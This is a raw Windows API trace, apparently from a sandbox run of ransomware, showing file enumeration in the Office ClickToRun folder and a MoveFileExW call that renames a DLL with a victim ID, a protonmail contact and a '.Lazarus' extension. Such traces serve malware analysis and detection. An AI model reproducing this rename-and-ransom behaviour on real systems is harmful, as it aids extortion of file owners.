[0078.286] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d4d0 [0078.286] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x77) returned 0x6a5b0 [0078.286] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0078.286] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb2) returned 0x5a6b8 [0078.286] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a5b0 | out: hHeap=0x20000) returned 1 [0078.286] AreFileApisANSI () returned 1 [0078.286] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0078.286] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x88) returned 0x82328 [0078.286] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x82328, cchWideChar=68 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R64.dll") returned 68 [0078.286] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5a6b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 130 [0078.286] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x104) returned 0x8bf40 [0078.286] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5a6b8, cbMultiByte=-1, lpWideCharStr=0x8bf40, cchWideChar=130 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R64.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 130 [0078.286] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r64.dll"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R64.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r64.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwFlags=0x2) returned 1 [0078.287] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8bf40 | out: hHeap=0x20000) returned 1 [0078.287] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82328 | out: hHeap=0x20000) returned 1 [0078.287] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0078.287] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d780 | out: hHeap=0x20000) returned 1 [0078.287] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d5a0 | out: hHeap=0x20000) returned 1 [0078.287] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x94680 | out: hHeap=0x20000) returned 1 [0078.287] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b680 | out: hHeap=0x20000) returned 1 [0078.287] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d1b8 | out: hHeap=0x20000) returned 1 [0078.287] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0078.287] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0078.287] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0078.287] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0078.287] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d738 | out: hHeap=0x20000) returned 1 [0078.287] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0078.287] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0078.287] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80b64383, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80b64383, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x8ee04f00, ftLastWriteTime.dwHighDateTime=0x1d0d67f, nFileSizeHigh=0x0, nFileSizeLow=0x1028, dwReserved0=0xa2a8bcf8, dwReserved1=0x3b0d2bd3, cFileName="C2RHeartbeatConfig.xml", cAlternateFileName="C2RHEA~1.XML")) returned 1 [0078.287] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0078.287] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0078.287] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0078.287] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0078.287] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0078.287] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0078.287] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0078.287] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0078.287] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0078.287] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0078.287] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0078.287] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0078.287] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0078.287] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0078.287] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0078.288] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0078.288] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0078.288] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0078.288] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0078.288] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e250 [0078.288] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0078.288] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0078.288] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e250 | out: hHeap=0x20000) returned 1 [0078.288] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0078.288] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x811e8 [0078.288] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0078.288] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0078.288] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0078.288] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0078.288] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0078.288] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x811e8 | out: hHeap=0x20000) returned 1 [0078.288] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0078.288] AreFileApisANSI () returned 1 [0078.288] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml", lpUsedDefaultChar=0x0) returned 81 [0078.288] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0078.288] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0078.288] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0078.288] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0078.288] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0078.288] AreFileApisANSI () returned 1 [0078.288] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b00, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 81 [0078.288] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa2) returned 0x5f428 [0078.288] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b00, cbMultiByte=-1, lpWideCharStr=0x5f428, cchWideChar=81 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml") returned 81 [0078.289] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2rheartbeatconfig.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0078.289] GetFileType (hFile=0x430) returned 0x1 [0078.289] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f428 | out: hHeap=0x20000) returned 1 [0078.289] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0078.289] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0078.289] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0078.289] CloseHandle (hObject=0x430) returned 1 [0078.290] AreFileApisANSI () returned 1 [0078.290] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b00, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 81 [0078.290] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa2) returned 0x5f428 [0078.290] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b00, cbMultiByte=-1, lpWideCharStr=0x5f428, cchWideChar=81 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml") returned 81 [0078.290] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2rheartbeatconfig.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0078.290] GetFileType (hFile=0x430) returned 0x1 [0078.290] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f428 | out: hHeap=0x20000) returned 1 [0078.290] CloseHandle (hObject=0x430) returned 1 [0078.290] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0078.290] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0078.290] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0078.290] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0078.290] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0078.290] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0078.290] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0078.290] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0078.290] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0078.290] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0078.290] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0078.290] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0078.290] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0078.290] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0078.290] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0078.291] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0078.291] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0078.291] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0078.291] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0078.291] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0078.291] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0078.291] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0078.291] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0078.291] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0078.291] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0078.291] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0078.291] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0078.291] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0078.291] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0078.291] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0078.291] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0078.291] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0078.291] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0078.291] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0078.291] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0078.291] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0078.291] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0078.291] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0078.291] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0078.291] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0078.291] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0078.291] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0078.291] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0078.291] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0078.291] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0078.291] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0078.291] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0078.291] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0078.291] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0078.291] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0078.291] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0078.292] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0078.292] AreFileApisANSI () returned 1 [0078.292] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b00, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 81 [0078.292] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa2) returned 0x5fe78 [0078.292] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b00, cbMultiByte=-1, lpWideCharStr=0x5fe78, cchWideChar=81 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml") returned 81 [0078.292] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2rheartbeatconfig.xml"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80b64383, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80b64383, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x8ee04f00, ftLastWriteTime.dwHighDateTime=0x1d0d67f, nFileSizeHigh=0x0, nFileSizeLow=0x1028)) returned 1 [0078.292] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fe78 | out: hHeap=0x20000) returned 1 [0078.292] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0078.292] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0078.292] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0078.292] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0078.292] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0078.292] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x808dbb6b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x808dbb6b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xb3841600, ftLastWriteTime.dwHighDateTime=0x1d0d7a8, nFileSizeHigh=0x0, nFileSizeLow=0xdc4b8, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="C2RUI.en-us.dll", cAlternateFileName="C2RUIE~1.DLL")) returned 1 [0078.292] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0078.292] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0078.292] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0078.292] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0078.292] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0078.292] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0078.292] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0078.292] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0078.292] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0078.292] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0078.292] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0078.292] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0078.292] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0078.292] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0078.292] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0078.292] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0078.292] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0078.292] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e7a0 [0078.292] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0078.293] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0078.293] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e7a0 | out: hHeap=0x20000) returned 1 [0078.293] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0078.293] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0078.293] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0078.293] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0078.293] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0078.293] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0078.293] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0078.293] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0078.293] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0078.293] AreFileApisANSI () returned 1 [0078.293] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RUI.en-us.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RUI.en-us.dll", lpUsedDefaultChar=0x0) returned 74 [0078.293] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d0b0 [0078.293] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0078.293] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0078.293] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0078.293] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0078.293] AreFileApisANSI () returned 1 [0078.293] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 74 [0078.293] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x94) returned 0x84fe0 [0078.293] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x84fe0, cchWideChar=74 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RUI.en-us.dll") returned 74 [0078.293] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RUI.en-us.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2rui.en-us.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0078.525] GetFileType (hFile=0x430) returned 0x1 [0078.525] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fe0 | out: hHeap=0x20000) returned 1 [0078.525] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0078.526] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0078.526] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0078.526] CloseHandle (hObject=0x430) returned 1 [0078.526] 